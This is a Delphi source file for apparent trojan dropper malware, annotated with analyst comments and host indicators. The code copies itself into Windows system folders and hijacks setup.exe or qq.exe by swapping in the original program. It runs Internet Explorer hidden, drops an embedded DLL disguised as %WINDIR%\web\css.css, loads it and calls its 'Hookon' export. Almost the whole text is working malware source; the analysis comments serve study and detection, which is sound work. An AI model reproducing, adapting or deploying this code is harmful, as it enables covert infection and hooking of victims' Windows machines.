
📄 bots1.dpr

program  bots1;
{$R dll.res}
uses
  Windows, Messages;

// Program-wide state used by the main block below.
var
  Msgt: TMsg;                  // message record filled by the GetMessage loop
  MHandle, FileHandle: DWORD;  // handles of the 'gg_exe' mutex and the 'gg_file' file mapping
  PThreadID: PDWORD;           // view of the mapping; receives this thread's ID
  hookon: procedure;           // bound at run time to the DLL export 'Hookon'
  hookoff: procedure;          // bound at run time to the DLL export 'Hookoff' (its call is commented out)
  dllHandle : THandle;         // module handle returned by LoadLibrary for the dropped file
  spath,tt:string;             // spath: Windows directory with trailing '\'; tt: directory of this executable

// Case-insensitive equality test for two strings, using the user's default
// locale. Returns True only when CompareString reports the strings as equal.
function CompareAnsiText(const S1, S2: string): Boolean;
const
  EqualOutcome = 2; // value CompareString returns for "equal" (CSTR_EQUAL)
var
  Outcome: Integer;
begin
  // -1 lengths tell the API to treat both arguments as null-terminated.
  Outcome := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE,
    PChar(S1), -1, PChar(S2), -1);
  Result := (Outcome = EqualOutcome);
end;
// Returns a system directory path that always ends in a backslash.
//   n = 1      -> the Windows directory (GetWindowsDirectory)
//   otherwise  -> the System directory (GetSystemDirectory)
// The API return values are not checked; the trailing-character test below
// assumes the call produced a non-empty path.
function getwinsys(n:integer):string;
var
  DirBuf: array[0..255] of char;
begin
  case n of
    1: GetWindowsDirectory(DirBuf, 255);
  else
    GetSystemDirectory(DirBuf, 255);
  end;
  Result := DirBuf;
  // Normalise so callers can append a relative name directly.
  if Result[Length(Result)] <> '\' then
    Result := Result + '\';
end;
// Returns the part of FileName that follows the last '\' or '/'.
// If there is no separator the whole string is returned; if the string
// ends in a separator the result is empty.
function ExtractFilename(FileName: string): string;
var
  Idx, LastSep: Integer;
begin
  LastSep := 0;
  // Scan backwards for the final path separator of either kind.
  for Idx := Length(FileName) downto 1 do
    if (FileName[Idx] = '\') or (FileName[Idx] = '/') then
    begin
      LastSep := Idx;
      Break;
    end;
  Result := Copy(FileName, LastSep + 1, MaxInt);
end;
// Returns the leading part of FileName up to and including the last '\' or
// '/'. Returns an empty string when FileName contains no separator.
function ExtractFilePath(FileName: string): string;
var
  Idx, LastSep: Integer;
begin
  LastSep := 0;
  // Scan backwards for the final path separator of either kind.
  for Idx := Length(FileName) downto 1 do
    if (FileName[Idx] = '\') or (FileName[Idx] = '/') then
    begin
      LastSep := Idx;
      Break;
    end;
  Result := Copy(FileName, 1, LastSep);
end;
// Analysis note: writes the RT_RCDATA resource named 'ggdll' from this
// executable to <Windows directory>\web\css.css.
// The resource is presumably linked in through the {$R dll.res} directive at
// the top of the file (the .res content is not shown here). The main block
// later passes the same path to LoadLibrary, so the ".css" file is handled as
// a DLL, not a stylesheet: its extension does not match its content type.
// Every step fails silently: if any lookup or the CreateFile call fails,
// nothing is written and no error is reported to the caller.
procedure Extract;
var
  ResourcePointer: pchar;
  ResourceLocation: HRSRC;
  ResourceSize, BytesWritten: Longword;
  ResDataHandle, FileHandle: THandle;  // FileHandle shadows the global of the same name
begin
  if True then  // always taken; has no effect on behaviour
  begin
    // Locate the embedded payload by resource name and type.
    ResourceLocation := FindResource(HInstance, 'ggdll', RT_RCDATA);
    if ResourceLocation <> 0 then
    begin
      ResourceSize := SizeofResource(HInstance, ResourceLocation);
      if ResourceSize <> 0 then
      begin
        ResDataHandle := LoadResource(HInstance, ResourceLocation);
        if ResDataHandle <> 0 then
        begin
          ResourcePointer := LockResource(ResDataHandle);
          if ResourcePointer <> nil then
          begin
            // CREATE_ALWAYS overwrites any existing file at this path.
            // Host indicator: a PE image stored as %WINDIR%\web\css.css.
            FileHandle := CreateFile(pchar(getwinsys(1) + 'web\css.css'), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
            if FileHandle <> INVALID_HANDLE_VALUE then
            begin
              // The WriteFile result and BytesWritten are not checked.
              WriteFile(FileHandle, ResourcePointer^, ResourceSize, BytesWritten, nil);
              CloseHandle(FileHandle);
            end;
          end;
        end;
      end;
    end;
  end;
end;
// Renames or moves OldName to NewName through the Win32 MoveFile call.
// Returns True on success and False otherwise.
function RenameFile(const OldName, NewName: string): Boolean;
var
  Src, Dst: PChar;
begin
  Src := PChar(OldName);
  Dst := PChar(NewName);
  Result := MoveFile(Src, Dst);
end;

// Analysis note: program entry point. Behaviour visible in this listing, in order:
//   1. Copies its own image to two locations under the Windows directory.
//   2. If it runs as setup.exe or qq.exe, temporarily swaps a sibling file
//      'exe.dat' into its own path, launches it, and swaps the files back.
//   3. Exits if a mutex named 'gg_exe' or 'gg_dll' already exists.
//   4. Starts Internet Explorer hidden, drops the embedded DLL (Extract),
//      loads it and calls its 'Hookon' export.
//   5. Idles in a message loop until WM_QUIT, then releases its handles.
// Host indicators present in the code: %WINDIR%\debug\debug.exe,
// %WINDIR%\Temp\~tmp83.tmp, %WINDIR%\web\css.css, '<name>.bak' and 'exe.dat'
// next to setup.exe/qq.exe, mutexes 'gg_exe'/'gg_dll', file mapping 'gg_file'.
begin
    spath:=getwinsys(1);
    // Self-copies; the last argument (fail-if-exists = true) keeps existing copies.
    copyfile(pchar(paramstr(0)),pchar(spath+'debug\debug.exe'),true);
    copyfile(pchar(paramstr(0)),pchar(spath+'Temp\~tmp83.tmp'),true);
    // Name check is case-insensitive and looks only at the file name, not the path.
    if CompareAnsiText('setup.exe',ExtractFilename(paramstr(0))) or CompareAnsiText('qq.exe',ExtractFilename(paramstr(0))) then
     begin
        tt:=ExtractFilepath(paramstr(0));
        // Move this binary aside, put 'exe.dat' in its place and run it, then
        // restore both names. 'exe.dat' is presumably the original program that
        // this binary replaced -- not shown in this file, confirm from other samples.
        renamefile(paramstr(0),paramstr(0)+'.bak');
        renamefile(tt+'exe.dat',paramstr(0));
        winexec(pchar(paramstr(0)),sw_normal);
        renamefile(paramstr(0),tt+'exe.dat');
        renamefile(paramstr(0)+'.bak',paramstr(0));
     end;
    // Single-instance guard: stop if either named mutex can be opened.
    // 'gg_exe' is created below; 'gg_dll' is not created in this file
    // (presumably by the DLL -- not shown here).
    if (OpenMutex(MUTEX_ALL_ACCESS, FALSE, 'gg_exe') <> 0) or
     (OpenMutex(MUTEX_ALL_ACCESS, FALSE, 'gg_dll') <> 0) then Exit;
    // Launches Internet Explorer with a hidden window, addressed relative to
    // the Windows directory through 8.3 short names.
    winexec(pchar(spath+'..\Progra~1\Intern~1\IEXPLORE.EXE'),sw_hide);
    Extract;
    // Loads the file written by Extract as a DLL despite its .css extension.
    dllHandle := LoadLibrary(pchar(spath+ 'web\css.css'));
    if dllHandle = 0 then Exit;
    // Both exports must resolve, otherwise unload and stop.
    @hookon := GetProcAddress(dllHandle,'Hookon');
    if not Assigned(hookon) then
    begin
      FreeLibrary(dllHandle);
      Exit;
    end;
    @hookoff := GetProcAddress(dllHandle,'Hookoff');
    if not Assigned(hookoff) then
    begin
      FreeLibrary(dllHandle);
      Exit;
    end;

  // Marks this process as the running instance for the guard above.
  MHandle := CreateMutex(nil, FALSE, 'gg_exe');

  // Named, pagefile-backed mapping ($FFFFFFFF = no backing file) holding one
  // DWORD: this thread's ID. Presumably read by the DLL so it can signal this
  // thread -- the DLL source is not shown here. The MapViewOfFile result is
  // not checked before it is dereferenced.
  FileHandle := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(DWORD), 'gg_file');
  PThreadID := MapViewOfFile(FileHandle, FILE_MAP_WRITE, 0, 0, 0);
  PThreadID^ := GetCurrentThreadID();
  UnmapViewOfFile(PThreadID);

  // Calls the DLL's 'Hookon' export; what it installs is defined in the DLL.
  Hookon;
  while GetMessage(Msgt, 0, 0, 0) do ; // wait for WM_QUIT
  ;//Hookoff;

  // Cleanup after the loop ends; the Hookoff call above is commented out, so
  // the export is resolved but never invoked from this program.
  CloseHandle(FileHandle);
  PostMessage(HWND_BROADCAST, WM_WININICHANGE, 0, 0);
  FreeLibrary(dllHandle);
  CloseHandle(MHandle);
end.
